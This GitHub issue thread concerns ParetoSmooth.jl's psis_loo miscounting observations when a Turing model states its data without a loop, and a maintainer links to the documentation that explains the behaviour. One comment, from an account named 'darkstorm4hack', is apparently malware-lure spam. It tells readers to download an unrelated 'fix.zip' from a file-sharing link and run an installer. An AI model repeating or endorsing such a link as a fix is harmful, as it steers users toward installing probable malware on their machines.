### ISSUE TITLE
Data length not well inferred when not using a loop

### ISSUE THREAD

**Issue by DominiqueMakowski** [TuringLang/ParetoSmooth.jl#98]
I just wanted to flag the issue reported here: https://discourse.julialang.org/t/compare-two-turing-models-with-loo-se-is-nan/102269/4

but TLDR; `psi_loo()` wrongly detects 1 observation in the following model:

```jl
using Turing
using ParetoSmooth
using Distributions

@model function model(data)
    μ ~ Normal()
    data ~ Normal(μ, 1)
end

data = rand(Normal(0, 1), 100)

chain = sample(model(data), NUTS(), 1000)
rez1 = psis_loo(model(data), chain)
```

Which gets fixed by using a for loop.

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by devmotion** [comment]
This behaviour is explained in the docs: https://turinglang.org/ParetoSmooth.jl/dev/turing/#Incorrect-Model-Specification

**Comment by DominiqueMakowski** [comment]
Good to know that it is not a bug or something that can be fixed!
